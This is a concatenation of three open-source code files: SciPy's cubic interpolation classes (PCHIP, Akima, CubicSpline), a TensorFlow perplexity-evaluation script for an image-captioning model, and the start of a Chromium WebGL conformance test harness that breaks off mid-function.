CubicSpline : Cubic spline data interpolator.
PPoly : Piecewise polynomial in terms of coefficients and breakpoints
Notes
-----
If you want to create a higher-order spline matching higher-order
derivatives, use `BPoly.from_derivatives`.
References
----------
.. [1] `Cubic Hermite spline
<https://en.wikipedia.org/wiki/Cubic_Hermite_spline>`_
on Wikipedia.
"""
def __init__(self, x, y, dydx, axis=0, extrapolate=None):
if extrapolate is None:
extrapolate = True
x, dx, y, axis, dydx = prepare_input(x, y, axis, dydx)
dxr = dx.reshape([dx.shape[0]] + [1] * (y.ndim - 1))
slope = np.diff(y, axis=0) / dxr
t = (dydx[:-1] + dydx[1:] - 2 * slope) / dxr
c = np.empty((4, len(x) - 1) + y.shape[1:], dtype=t.dtype)
c[0] = t / dxr
c[1] = (slope - dydx[:-1]) / dxr - t
c[2] = dydx[:-1]
c[3] = y[:-1]
super().__init__(c, x, extrapolate=extrapolate)
self.axis = axis
class PchipInterpolator(CubicHermiteSpline):
r"""PCHIP 1-D monotonic cubic interpolation.
``x`` and ``y`` are arrays of values used to approximate some function f,
with ``y = f(x)``. The interpolant uses monotonic cubic splines
to find the value of new points. (PCHIP stands for Piecewise Cubic
Hermite Interpolating Polynomial).
Parameters
----------
x : ndarray
A 1-D array of monotonically increasing real values. ``x`` cannot
include duplicate values (otherwise f is overspecified)
y : ndarray
A 1-D array of real values. ``y``'s length along the interpolation
axis must be equal to the length of ``x``. If N-D array, use ``axis``
parameter to select correct axis.
axis : int, optional
Axis in the y array corresponding to the x-coordinate values.
extrapolate : bool, optional
Whether to extrapolate to out-of-bounds points based on first
and last intervals, or to return NaNs.
Methods
-------
__call__
derivative
antiderivative
roots
See Also
--------
CubicHermiteSpline : Piecewise-cubic interpolator.
Akima1DInterpolator : Akima 1D interpolator.
CubicSpline : Cubic spline data interpolator.
PPoly : Piecewise polynomial in terms of coefficients and breakpoints.
Notes
-----
The interpolator preserves monotonicity in the interpolation data and does
not overshoot if the data is not smooth.
The first derivatives are guaranteed to be continuous, but the second
derivatives may jump at :math:`x_k`.
Determines the derivatives at the points :math:`x_k`, :math:`f'_k`,
by using PCHIP algorithm [1]_.
Let :math:`h_k = x_{k+1} - x_k`, and :math:`d_k = (y_{k+1} - y_k) / h_k`
are the slopes at internal points :math:`x_k`.
If the signs of :math:`d_k` and :math:`d_{k-1}` are different or either of
them equals zero, then :math:`f'_k = 0`. Otherwise, it is given by the
weighted harmonic mean
.. math::
\frac{w_1 + w_2}{f'_k} = \frac{w_1}{d_{k-1}} + \frac{w_2}{d_k}
where :math:`w_1 = 2 h_k + h_{k-1}` and :math:`w_2 = h_k + 2 h_{k-1}`.
The end slopes are set using a one-sided scheme [2]_.
References
----------
.. [1] F. N. Fritsch and J. Butland,
A method for constructing local
monotone piecewise cubic interpolants,
SIAM J. Sci. Comput., 5(2), 300-304 (1984).
:doi:`10.1137/0905021`.
.. [2] see, e.g., C. Moler, Numerical Computing with Matlab, 2004.
:doi:`10.1137/1.9780898717952`
"""
def __init__(self, x, y, axis=0, extrapolate=None):
x, _, y, axis, _ = prepare_input(x, y, axis)
xp = x.reshape((x.shape[0],) + (1,)*(y.ndim-1))
dk = self._find_derivatives(xp, y)
super().__init__(x, y, dk, axis=0, extrapolate=extrapolate)
self.axis = axis
@staticmethod
def _edge_case(h0, h1, m0, m1):
# one-sided three-point estimate for the derivative
d = ((2*h0 + h1)*m0 - h0*m1) / (h0 + h1)
# try to preserve shape
mask = np.sign(d) != np.sign(m0)
mask2 = (np.sign(m0) != np.sign(m1)) & (np.abs(d) > 3.*np.abs(m0))
mmm = (~mask) & mask2
d[mask] = 0.
d[mmm] = 3.*m0[mmm]
return d
@staticmethod
def _find_derivatives(x, y):
# Determine the derivatives at the points y_k, d_k, by using
# PCHIP algorithm is:
# We choose the derivatives at the point x_k by
# Let m_k be the slope of the kth segment (between k and k+1)
# If m_k=0 or m_{k-1}=0 or sgn(m_k) != sgn(m_{k-1}) then d_k == 0
# else use weighted harmonic mean:
# w_1 = 2h_k + h_{k-1}, w_2 = h_k + 2h_{k-1}
# 1/d_k = 1/(w_1 + w_2)*(w_1 / m_k + w_2 / m_{k-1})
# where h_k is the spacing between x_k and x_{k+1}
y_shape = y.shape
if y.ndim == 1:
# So that _edge_case doesn't end up assigning to scalars
x = x[:, None]
y = y[:, None]
hk = x[1:] - x[:-1]
mk = (y[1:] - y[:-1]) / hk
if y.shape[0] == 2:
# edge case: only have two points, use linear interpolation
dk = np.zeros_like(y)
dk[0] = mk
dk[1] = mk
return dk.reshape(y_shape)
smk = np.sign(mk)
condition = (smk[1:] != smk[:-1]) | (mk[1:] == 0) | (mk[:-1] == 0)
w1 = 2*hk[1:] + hk[:-1]
w2 = hk[1:] + 2*hk[:-1]
# values where division by zero occurs will be excluded
# by 'condition' afterwards
with np.errstate(divide='ignore'):
whmean = (w1/mk[:-1] + w2/mk[1:]) / (w1 + w2)
dk = np.zeros_like(y)
dk[1:-1][condition] = 0.0
dk[1:-1][~condition] = 1.0 / whmean[~condition]
# special case endpoints, as suggested in
# Cleve Moler, Numerical Computing with MATLAB, Chap 3.6 (pchiptx.m)
dk[0] = PchipInterpolator._edge_case(hk[0], hk[1], mk[0], mk[1])
dk[-1] = PchipInterpolator._edge_case(hk[-1], hk[-2], mk[-1], mk[-2])
return dk.reshape(y_shape)
def pchip_interpolate(xi, yi, x, der=0, axis=0):
"""
Convenience function for pchip interpolation.
xi and yi are arrays of values used to approximate some function f,
with ``yi = f(xi)``. The interpolant uses monotonic cubic splines
to find the value of new points x and the derivatives there.
See `scipy.interpolate.PchipInterpolator` for details.
Parameters
----------
xi : array_like
A sorted list of x-coordinates, of length N.
yi : array_like
A 1-D array of real values. `yi`'s length along the interpolation
axis must be equal to the length of `xi`. If N-D array, use axis
parameter to select correct axis.
x : scalar or array_like
Of length M.
der : int or list, optional
Derivatives to extract. The 0th derivative can be included to
return the function value.
axis : int, optional
Axis in the yi array corresponding to the x-coordinate values.
See Also
--------
PchipInterpolator : PCHIP 1-D monotonic cubic interpolator.
Returns
-------
y : scalar or array_like
The result, of length R or length M or M by R,
Examples
--------
We can interpolate 2D observed data using pchip interpolation:
>>> import matplotlib.pyplot as plt
>>> from scipy.interpolate import pchip_interpolate
>>> x_observed = np.linspace(0.0, 10.0, 11)
>>> y_observed = np.sin(x_observed)
>>> x = np.linspace(min(x_observed), max(x_observed), num=100)
>>> y = pchip_interpolate(x_observed, y_observed, x)
>>> plt.plot(x_observed, y_observed, "o", label="observation")
>>> plt.plot(x, y, label="pchip interpolation")
>>> plt.legend()
>>> plt.show()
"""
P = PchipInterpolator(xi, yi, axis=axis)
if der == 0:
return P(x)
elif _isscalar(der):
return P.derivative(der)(x)
else:
return [P.derivative(nu)(x) for nu in der]
class Akima1DInterpolator(CubicHermiteSpline):
"""
Akima interpolator
Fit piecewise cubic polynomials, given vectors x and y. The interpolation
method by Akima uses a continuously differentiable sub-spline built from
piecewise cubic polynomials. The resultant curve passes through the given
data points and will appear smooth and natural.
Parameters
----------
x : ndarray, shape (m, )
1-D array of monotonically increasing real values.
y : ndarray, shape (m, ...)
N-D array of real values. The length of ``y`` along the first axis
must be equal to the length of ``x``.
axis : int, optional
Specifies the axis of ``y`` along which to interpolate. Interpolation
defaults to the first axis of ``y``.
Methods
-------
__call__
derivative
antiderivative
roots
See Also
--------
PchipInterpolator : PCHIP 1-D monotonic cubic interpolator.
CubicSpline : Cubic spline data interpolator.
PPoly : Piecewise polynomial in terms of coefficients and breakpoints
Notes
-----
.. versionadded:: 0.14
Use only for precise data, as the fitted curve passes through the given
points exactly. This routine is useful for plotting a pleasingly smooth
curve through a few given points for purposes of plotting.
References
----------
[1] A new method of interpolation and smooth curve fitting based
on local procedures. Hiroshi Akima, J. ACM, October 1970, 17(4),
589-602.
"""
def __init__(self, x, y, axis=0):
# Original implementation in MATLAB by N. Shamsundar (BSD licensed), see
# https://www.mathworks.com/matlabcentral/fileexchange/1814-akima-interpolation
x, dx, y, axis, _ = prepare_input(x, y, axis)
# determine slopes between breakpoints
m = np.empty((x.size + 3, ) + y.shape[1:])
dx = dx[(slice(None), ) + (None, ) * (y.ndim - 1)]
m[2:-2] = np.diff(y, axis=0) / dx
# add two additional points on the left ...
m[1] = 2. * m[2] - m[3]
m[0] = 2. * m[1] - m[2]
# ... and on the right
m[-2] = 2. * m[-3] - m[-4]
m[-1] = 2. * m[-2] - m[-3]
# if m1 == m2 != m3 == m4, the slope at the breakpoint is not defined.
# This is the fill value:
t = .5 * (m[3:] + m[:-3])
# get the denominator of the slope t
dm = np.abs(np.diff(m, axis=0))
f1 = dm[2:]
f2 = dm[:-2]
f12 = f1 + f2
# These are the mask of where the the slope at breakpoint is defined:
ind = np.nonzero(f12 > 1e-9 * np.max(f12))
x_ind, y_ind = ind[0], ind[1:]
# Set the slope at breakpoint
t[ind] = (f1[ind] * m[(x_ind + 1,) + y_ind] +
f2[ind] * m[(x_ind + 2,) + y_ind]) / f12[ind]
super().__init__(x, y, t, axis=0, extrapolate=False)
self.axis = axis
def extend(self, c, x, right=True):
raise NotImplementedError("Extending a 1-D Akima interpolator is not "
"yet implemented")
# These are inherited from PPoly, but they do not produce an Akima
# interpolator. Hence stub them out.
@classmethod
def from_spline(cls, tck, extrapolate=None):
raise NotImplementedError("This method does not make sense for "
"an Akima interpolator.")
@classmethod
def from_bernstein_basis(cls, bp, extrapolate=None):
raise NotImplementedError("This method does not make sense for "
"an Akima interpolator.")
class CubicSpline(CubicHermiteSpline):
"""Cubic spline data interpolator.
Interpolate data with a piecewise cubic polynomial which is twice
continuously differentiable [1]_. The result is represented as a `PPoly`
instance with breakpoints matching the given data.
Parameters
----------
x : array_like, shape (n,)
1-D array containing values of the independent variable.
Values must be real, finite and in strictly increasing order.
y : array_like
Array containing values of the dependent variable. It can have
arbitrary number of dimensions, but the length along ``axis``
(see below) must match the length of ``x``. Values must be finite.
axis : int, optional
Axis along which `y` is assumed to be varying. Meaning that for
``x[i]`` the corresponding values are ``np.take(y, i, axis=axis)``.
Default is 0.
bc_type : string or 2-tuple, optional
Boundary condition type. Two additional equations, given by the
boundary conditions, are required to determine all coefficients of
polynomials on each segment [2]_.
If `bc_type` is a string, then the specified condition will be applied
at both ends of a spline. Available conditions are:
* 'not-a-knot' (default): The first and second segment at a curve end
are the same polynomial. It is a good default when there is no
information on boundary conditions.
* 'periodic': The interpolated functions is assumed to be periodic
of period ``x[-1] - x[0]``. The first and last value of `y` must be
identical: ``y[0] == y[-1]``. This boundary condition will result in
``y'[0] == y'[-1]`` and ``y''[0] == y''[-1]``.
* 'clamped': The first derivative at curves ends are zero. Assuming
a 1D `y`, ``bc_type=((1, 0.0), (1, 0.0))`` is the same condition.
* 'natural': The second derivative at curve ends are zero. Assuming
a 1D `y`, ``bc_type=((2, 0.0), (2, 0.0))`` is the same condition.
If `bc_type` is a 2-tuple, the first and the second value will be
applied at the curve start and end respectively. The tuple values can
be one of the previously mentioned strings (except 'periodic') or a
tuple `(order, deriv_values)` allowing to specify arbitrary
derivatives at curve ends:
* `order`: the derivative order, 1 or 2.
* `deriv_value`: array_like containing derivative values, shape must
be the same as `y`, excluding ``axis`` dimension. For example, if
`y` is 1-D, then `deriv_value` must be a scalar. If `y` is 3-D with
the shape (n0, n1, n2) and axis=2, then `deriv_value` must be 2-D
and have the shape (n0, n1).
extrapolate : {bool, 'periodic', None}, optional
If bool, determines whether to extrapolate to out-of-bounds points
based on first and last intervals, or to return NaNs. If 'periodic',
periodic extrapolation is used. If None (default), ``extrapolate`` is
set to 'periodic' for ``bc_type='periodic'`` and to True otherwise.
Attributes
----------
x : ndarray, shape (n,)
Breakpoints. The same ``x`` which was passed to the constructor.
c : ndarray, shape (4, n-1, ...)
Coefficients of the polynomials on each segment. The trailing
dimensions match the dimensions of `y`, excluding ``axis``.
For example, if `y` is 1-d, then ``c[k, i]`` is a coefficient for
``(x-x[i])**(3-k)`` on the segment between ``x[i]`` and ``x[i+1]``.
axis : int
Interpolation axis. The same axis which was passed to the
constructor.
Methods
-------
__call__
derivative
antiderivative
integrate
roots
See Also
--------
Akima1DInterpolator : Akima 1D interpolator.
PchipInterpolator : PCHIP 1-D monotonic cubic interpolator.
PPoly : Piecewise polynomial in terms of coefficients and breakpoints.
Notes
-----
Parameters `bc_type` and ``interpolate`` work independently, i.e. the
former controls only construction of a spline, and the latter only
evaluation.
When a boundary condition is 'not-a-knot' and n = 2, it is replaced by
a condition that the first derivative is equal to the linear interpolant
slope. When both boundary conditions are 'not-a-knot' and n = 3, the
solution is sought as a parabola passing through given points.
When 'not-a-knot' boundary conditions is applied to both ends, the
resulting spline will be the same as returned by `splrep` (with ``s=0``)
and `InterpolatedUnivariateSpline`, but these two methods use a
representation in B-spline basis.
.. versionadded:: 0.18.0
Examples
--------
In this example the cubic spline is used to interpolate a sampled sinusoid.
You can see that the spline continuity property holds for the first and
second derivatives and violates only for the third derivative.
>>> from scipy.interpolate import CubicSpline
>>> import matplotlib.pyplot as plt
>>> x = np.arange(10)
>>> y = np.sin(x)
>>> cs = CubicSpline(x, y)
>>> xs = np.arange(-0.5, 9.6, 0.1)
>>> fig, ax = plt.subplots(figsize=(6.5, 4))
>>> ax.plot(x, y, 'o', label='data')
>>> ax.plot(xs, np.sin(xs), label='true')
>>> ax.plot(xs, cs(xs), label="S")
>>> ax.plot(xs, cs(xs, 1), label="S'")
>>> ax.plot(xs, cs(xs, 2), label="S''")
>>> ax.plot(xs, cs(xs, 3), label="S'''")
>>> ax.set_xlim(-0.5, 9.5)
>>> ax.legend(loc='lower left', ncol=2)
>>> plt.show()
In the second example, the unit circle is interpolated with a spline. A
periodic boundary condition is used. You can see that the first derivative
values, ds/dx=0, ds/dy=1 at the periodic point (1, 0) are correctly
computed. Note that a circle cannot be exactly represented by a cubic
spline. To increase precision, more breakpoints would be required.
>>> theta = 2 * np.pi * np.linspace(0, 1, 5)
>>> y = np.c_[np.cos(theta), np.sin(theta)]
>>> cs = CubicSpline(theta, y, bc_type='periodic')
>>> print("ds/dx={:.1f} ds/dy={:.1f}".format(cs(0, 1)[0], cs(0, 1)[1]))
ds/dx=0.0 ds/dy=1.0
>>> xs = 2 * np.pi * np.linspace(0, 1, 100)
>>> fig, ax = plt.subplots(figsize=(6.5, 4))
>>> ax.plot(y[:, 0], y[:, 1], 'o', label='data')
>>> ax.plot(np.cos(xs), np.sin(xs), label='true')
>>> ax.plot(cs(xs)[:, 0], cs(xs)[:, 1], label='spline')
>>> ax.axes.set_aspect('equal')
>>> ax.legend(loc='center')
>>> plt.show()
The third example is the interpolation of a polynomial y = x**3 on the
interval 0 <= x<= 1. A cubic spline can represent this function exactly.
To achieve that we need to specify values and first derivatives at
endpoints of the interval. Note that y' = 3 * x**2 and thus y'(0) = 0 and
y'(1) = 3.
>>> cs = CubicSpline([0, 1], [0, 1], bc_type=((1, 0), (1, 3)))
>>> x = np.linspace(0, 1)
>>> np.allclose(x**3, cs(x))
True
References
----------
.. [1] `Cubic Spline Interpolation
<https://en.wikiversity.org/wiki/Cubic_Spline_Interpolation>`_
on Wikiversity.
.. [2] Carl de Boor, "A Practical Guide to Splines", Springer-Verlag, 1978.
"""
def __init__(self, x, y, axis=0, bc_type='not-a-knot', extrapolate=None):
x, dx, y, axis, _ = prepare_input(x, y, axis)
n = len(x)
bc, y = self._validate_bc(bc_type, y, y.shape[1:], axis)
if extrapolate is None:
if bc[0] == 'periodic':
extrapolate = 'periodic'
else:
extrapolate = True
dxr = dx.reshape([dx.shape[0]] + [1] * (y.ndim - 1))
slope = np.diff(y, axis=0) / dxr
# If bc is 'not-a-knot' this change is just a convention.
# If bc is 'periodic' then we already checked that y[0] == y[-1],
# and the spline is just a constant, we handle this case in the same
# way by setting the first derivatives to slope, which is 0.
if n == 2:
if bc[0] in ['not-a-knot', 'periodic']:
bc[0] = (1, slope[0])
if bc[1] in ['not-a-knot', 'periodic']:
bc[1] = (1, slope[0])
# This is a very special case, when both conditions are 'not-a-knot'
# and n == 3. In this case 'not-a-knot' can't be handled regularly
# as the both conditions are identical. We handle this case by
# constructing a parabola passing through given points.
if n == 3 and bc[0] == 'not-a-knot' and bc[1] == 'not-a-knot':
A = np.zeros((3, 3)) # This is a standard matrix.
b = np.empty((3,) + y.shape[1:], dtype=y.dtype)
A[0, 0] = 1
A[0, 1] = 1
A[1, 0] = dx[1]
A[1, 1] = 2 * (dx[0] + dx[1])
A[1, 2] = dx[0]
A[2, 1] = 1
A[2, 2] = 1
b[0] = 2 * slope[0]
b[1] = 3 * (dxr[0] * slope[1] + dxr[1] * slope[0])
b[2] = 2 * slope[1]
s = solve(A, b, overwrite_a=True, overwrite_b=True,
check_finite=False)
elif n == 3 and bc[0] == 'periodic':
# In case when number of points is 3 we should count derivatives
# manually
s = np.empty((n,) + y.shape[1:], dtype=y.dtype)
t = (slope / dxr).sum() / (1. / dxr).sum()
s.fill(t)
else:
# Find derivative values at each x[i] by solving a tridiagonal
# system.
A = np.zeros((3, n)) # This is a banded matrix representation.
b = np.empty((n,) + y.shape[1:], dtype=y.dtype)
# Filling the system for i=1..n-2
# (x[i-1] - x[i]) * s[i-1] +\
# 2 * ((x[i] - x[i-1]) + (x[i+1] - x[i])) * s[i] +\
# (x[i] - x[i-1]) * s[i+1] =\
# 3 * ((x[i+1] - x[i])*(y[i] - y[i-1])/(x[i] - x[i-1]) +\
# (x[i] - x[i-1])*(y[i+1] - y[i])/(x[i+1] - x[i]))
A[1, 1:-1] = 2 * (dx[:-1] + dx[1:]) # The diagonal
A[0, 2:] = dx[:-1] # The upper diagonal
A[-1, :-2] = dx[1:] # The lower diagonal
b[1:-1] = 3 * (dxr[1:] * slope[:-1] + dxr[:-1] * slope[1:])
bc_start, bc_end = bc
if bc_start == 'periodic':
# Due to the periodicity, and because y[-1] = y[0], the linear
# system has (n-1) unknowns/equations instead of n:
A = A[:, 0:-1]
A[1, 0] = 2 * (dx[-1] + dx[0])
A[0, 1] = dx[-1]
b = b[:-1]
# Also, due to the periodicity, the system is not tri-diagonal.
# We need to compute a "condensed" matrix of shape (n-2, n-2).
# See https://web.archive.org/web/20151220180652/http://www.cfm.brown.edu/people/gk/chap6/node14.html
# for more explanations.
# The condensed matrix is obtained by removing the last column
# and last row of the (n-1, n-1) system matrix. The removed
# values are saved in scalar variables with the (n-1, n-1)
# system matrix indices forming their names:
a_m1_0 = dx[-2] # lower left corner value: A[-1, 0]
a_m1_m2 = dx[-1]
a_m1_m1 = 2 * (dx[-1] + dx[-2])
a_m2_m1 = dx[-3]
a_0_m1 = dx[0]
b[0] = 3 * (dxr[0] * slope[-1] + dxr[-1] * slope[0])
b[-1] = 3 * (dxr[-1] * slope[-2] + dxr[-2] * slope[-1])
Ac = A[:, :-1]
b1 = b[:-1]
b2 = np.zeros_like(b1)
b2[0] = -a_0_m1
b2[-1] = -a_m2_m1
# s1 and s2 are the solutions of (n-2, n-2) system
s1 = solve_banded((1, 1), Ac, b1, overwrite_ab=False,
overwrite_b=False, check_finite=False)
s2 = solve_banded((1, 1), Ac, b2, overwrite_ab=False,
overwrite_b=False, check_finite=False)
# computing the s[n-2] solution:
s_m1 = ((b[-1] - a_m1_0 * s1[0] - a_m1_m2 * s1[-1]) /
(a_m1_m1 + a_m1_0 * s2[0] + a_m1_m2 * s2[-1]))
# s is the solution of the (n, n) system:
s = np.empty((n,) + y.shape[1:], dtype=y.dtype)
s[:-2] = s1 + s_m1 * s2
s[-2] = s_m1
s[-1] = s[0]
else:
if bc_start == 'not-a-knot':
A[1, 0] = dx[1]
A[0, 1] = x[2] - x[0]
d = x[2] - x[0]
b[0] = ((dxr[0] + 2*d) * dxr[1] * slope[0] +
dxr[0]**2 * slope[1]) / d
elif bc_start[0] == 1:
A[1, 0] = 1
A[0, 1] = 0
b[0] = bc_start[1]
elif bc_start[0] == 2:
A[1, 0] = 2 * dx[0]
A[0, 1] = dx[0]
b[0] = -0.5 * bc_start[1] * dx[0]**2 + 3 * (y[1] - y[0])
if bc_end == 'not-a-knot':
A[1, -1] = dx[-2]
A[-1, -2] = x[-1] - x[-3]
d = x[-1] - x[-3]
b[-1] = ((dxr[-1]**2*slope[-2] +
(2*d + dxr[-1])*dxr[-2]*slope[-1]) / d)
elif bc_end[0] == 1:
A[1, -1] = 1
A[-1, -2] = 0
b[-1] = bc_end[1]
elif bc_end[0] == 2:
A[1, -1] = 2 * dx[-1]
A[-1, -2] = dx[-1]
b[-1] = 0.5 * bc_end[1] * dx[-1]**2 + 3 * (y[-1] - y[-2])
s = solve_banded((1, 1), A, b, overwrite_ab=True,
overwrite_b=True, check_finite=False)
super().__init__(x, y, s, axis=0, extrapolate=extrapolate)
self.axis = axis
@staticmethod
def _validate_bc(bc_type, y, expected_deriv_shape, axis):
"""Validate and prepare boundary conditions.
Returns
-------
validated_bc : 2-tuple
Boundary conditions for a curve start and end.
y : ndarray
y casted to complex dtype if one of the boundary conditions has
complex dtype.
"""
if isinstance(bc_type, str):
if bc_type == 'periodic':
if not np.allclose(y[0], y[-1], rtol=1e-15, atol=1e-15):
raise ValueError(
"The first and last `y` point along axis {} must "
"be identical (within machine precision) when "
"bc_type='periodic'.".format(axis))
bc_type = (bc_type, bc_type)
else:
if len(bc_type) != 2:
raise ValueError("`bc_type` must contain 2 elements to "
"specify start and end conditions.")
if 'periodic' in bc_type:
raise ValueError("'periodic' `bc_type` is defined for both "
"curve ends and cannot be used with other "
"boundary conditions.")
validated_bc = []
for bc in bc_type:
if isinstance(bc, str):
if bc == 'clamped':
validated_bc.append((1, np.zeros(expected_deriv_shape)))
elif bc == 'natural':
validated_bc.append((2, np.zeros(expected_deriv_shape)))
elif bc in ['not-a-knot', 'periodic']:
validated_bc.append(bc)
else:
raise ValueError("bc_type={} is not allowed.".format(bc))
else:
try:
deriv_order, deriv_value = bc
except Exception as e:
raise ValueError(
"A specified derivative value must be "
"given in the form (order, value)."
) from e
if deriv_order not in [1, 2]:
raise ValueError("The specified derivative order must "
"be 1 or 2.")
deriv_value = np.asarray(deriv_value)
if deriv_value.shape != expected_deriv_shape:
raise ValueError(
"`deriv_value` shape {} is not the expected one {}."
.format(deriv_value.shape, expected_deriv_shape))
if np.issubdtype(deriv_value.dtype, np.complexfloating):
y = y.astype(complex, copy=False)
validated_bc.append((deriv_order, deriv_value))
return validated_bc, y
| WarrenWeckesser/scipy | scipy/interpolate/_cubic.py | Python | bsd-3-clause | 33,069 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Evaluate the model.
This script should be run concurrently with training so that summaries show up
in TensorBoard.
If you want to run the script without GPU, you should define CUDA_VISIBLE_DEVICES="" before running the code.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import os.path
import time
import numpy as np
import tensorflow as tf
from ricga import configuration
from ricga import ricga_model
FLAGS = tf.flags.FLAGS
tf.flags.DEFINE_string("input_file_pattern", "/home/meteorshub/code/RICGA/ricga/data/mscoco/val-?????-of-00004",
"File pattern of sharded TFRecord input files.")
tf.flags.DEFINE_string("checkpoint_dir", "/home/meteorshub/code/RICGA/ricga/model/train",
"Directory containing model checkpoints.")
tf.flags.DEFINE_string("eval_dir", "/home/meteorshub/code/RICGA/ricga/model/eval", "Directory to write event logs.")
tf.flags.DEFINE_integer("eval_interval_secs", 600,
"Interval between evaluation runs.")
tf.flags.DEFINE_integer("num_eval_examples", 10132,
"Number of examples for evaluation.")
tf.flags.DEFINE_integer("min_global_step", 100,
"Minimum global step to run evaluation.")
tf.logging.set_verbosity(tf.logging.INFO)
def evaluate_model(sess, model, global_step, summary_writer, summary_op):
"""Computes perplexity-per-word over the evaluation dataset.
Summaries and perplexity-per-word are written out to the eval directory.
Args:
sess: Session object.
model: Instance of RicgaModel; the model to evaluate.
global_step: Integer; global step of the model checkpoint.
summary_writer: Instance of FileWriter.
summary_op: Op for generating model summaries.
"""
# Log model summaries on a single batch.
summary_str = sess.run(summary_op)
summary_writer.add_summary(summary_str, global_step)
# Compute perplexity over the entire dataset.
num_eval_batches = int(
math.ceil(FLAGS.num_eval_examples / model.config.batch_size))
start_time = time.time()
sum_losses = 0.
sum_weights = 0.
for i in xrange(num_eval_batches):
cross_entropy_losses, weights = sess.run([
model.target_cross_entropy_losses,
model.target_cross_entropy_loss_weights
])
sum_losses += np.sum(cross_entropy_losses * weights)
sum_weights += np.sum(weights)
if not i % 100:
tf.logging.info("Computed losses for %d of %d batches.", i + 1,
num_eval_batches)
eval_time = time.time() - start_time
perplexity = math.exp(sum_losses / sum_weights)
tf.logging.info("Perplexity = %f (%.2g sec)", perplexity, eval_time)
# Log perplexity to the FileWriter.
summary = tf.Summary()
value = summary.value.add()
value.simple_value = perplexity
value.tag = "Perplexity"
summary_writer.add_summary(summary, global_step)
# Write the Events file to the eval directory.
summary_writer.flush()
tf.logging.info("Finished processing evaluation at global step %d.",
global_step)
def run_once(model, saver, summary_writer, summary_op):
"""Evaluates the latest model checkpoint.
Args:
model: Instance of RicgaModel; the model to evaluate.
saver: Instance of tf.train.Saver for restoring model Variables.
summary_writer: Instance of FileWriter.
summary_op: Op for generating model summaries.
"""
model_path = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)
if not model_path:
tf.logging.info("Skipping evaluation. No checkpoint found in: %s",
FLAGS.checkpoint_dir)
return
with tf.Session() as sess:
# Load model from checkpoint.
tf.logging.info("Loading model from checkpoint: %s", model_path)
saver.restore(sess, model_path)
global_step = tf.train.global_step(sess, model.global_step.name)
tf.logging.info("Successfully loaded %s at global step = %d.",
os.path.basename(model_path), global_step)
if global_step < FLAGS.min_global_step:
tf.logging.info("Skipping evaluation. Global step = %d < %d", global_step,
FLAGS.min_global_step)
return
# Start the queue runners.
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
# Run evaluation on the latest checkpoint.
try:
evaluate_model(
sess=sess,
model=model,
global_step=global_step,
summary_writer=summary_writer,
summary_op=summary_op)
except Exception, e: # pylint: disable=broad-except
tf.logging.error("Evaluation failed.")
coord.request_stop(e)
coord.request_stop()
coord.join(threads, stop_grace_period_secs=10)
def run():
"""Runs evaluation in a loop, and logs summaries to TensorBoard."""
# Create the evaluation directory if it doesn't exist.
eval_dir = FLAGS.eval_dir
if not tf.gfile.IsDirectory(eval_dir):
tf.logging.info("Creating eval directory: %s", eval_dir)
tf.gfile.MakeDirs(eval_dir)
g = tf.Graph()
with g.as_default():
# Build the model for evaluation.
model_config = configuration.ModelConfig()
model_config.input_file_pattern = FLAGS.input_file_pattern
model = ricga_model.RicgaModel(model_config, mode="eval")
model.build()
# Create the Saver to restore model Variables.
saver = tf.train.Saver()
# Create the summary operation and the summary writer.
summary_op = tf.summary.merge_all()
summary_writer = tf.summary.FileWriter(eval_dir)
g.finalize()
# Run a new evaluation run every eval_interval_secs.
while True:
start = time.time()
tf.logging.info("Starting evaluation at " + time.strftime(
"%Y-%m-%d-%H:%M:%S", time.localtime()))
run_once(model, saver, summary_writer, summary_op)
time_to_next_eval = start + FLAGS.eval_interval_secs - time.time()
if time_to_next_eval > 0:
time.sleep(time_to_next_eval)
def main(unused_argv):
assert FLAGS.input_file_pattern, "--input_file_pattern is required"
assert FLAGS.checkpoint_dir, "--checkpoint_dir is required"
assert FLAGS.eval_dir, "--eval_dir is required"
run()
if __name__ == "__main__":
tf.app.run()
| MeteorKepler/RICGA | ricga/evaluate.py | Python | apache-2.0 | 7,364 |
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import os
import sys
import webgl_conformance_expectations
from telemetry import test as test_module
from telemetry.core import util
from telemetry.page import page_set
from telemetry.page import page_test
conformance_path = os.path.join(
util.GetChromiumSrcDir(), 'third_party', 'webgl_conformance')
conformance_harness_script = r"""
var testHarness = {};
testHarness._allTestSucceeded = true;
testHarness._messages = '';
testHarness._failures = 0;
testHarness._finished = false;
testHarness.reportResults = function(success, msg) {
testHarness._allTestSucceeded = testHarness._allTestSucceeded && !!success;
if(!success) {
testHarness._failures++;
if(msg) {
testHarness._messages += msg + "\n";
}
}
};
testHarness.notifyFinished = function() {
testHarness._finished = true;
};
testHarness.navigateToPage = function(src) {
var testFrame = document.getElementById("test-frame");
testFrame.src = src;
};
window.webglTestHarness = testHarness;
window.parent.webglTestHarness = testHarness;
console.log("Harness injected.");
"""
def _DidWebGLTestSucceed(tab):
return tab.EvaluateJavaScript('webglTestHarness._allTestSucceeded')
def _WebGLTestMessages(tab):
return tab.EvaluateJavaScript('webglTestHarness._messages')
class WebglConformanceValidator(page_test.PageTest):
def __init__(self):
super(WebglConformanceValidator, self).__init__('ValidatePage')
def ValidatePage(self, page, tab, results):
if not _DidWebGLTestSucceed(tab):
raise page_test.Failure(_WebGLTestMessages(tab))
def CustomizeBrowserOptions(self, options):
options.AppendExtraBrowserArg('--enable-webgl')
options.AppendExtraBrowserArg(
'--disable-gesture-requirement-for-media-playback')
class WebglConformance(test_module.Test):
"""Conformance with Khronos WebGL Conformance Tests"""
enabled = False
test = WebglConformanceValidator
def CreatePageSet(self, options):
tests = self._ParseTests('00_test_list.txt', '1.0.1')
page_set_dict = {
'description': 'Executes WebGL conformance tests',
'user_agent_type': 'desktop',
'serving_dirs': [ '' ],
'pages': []
}
pages = page_set_dict['pages']
for test in tests:
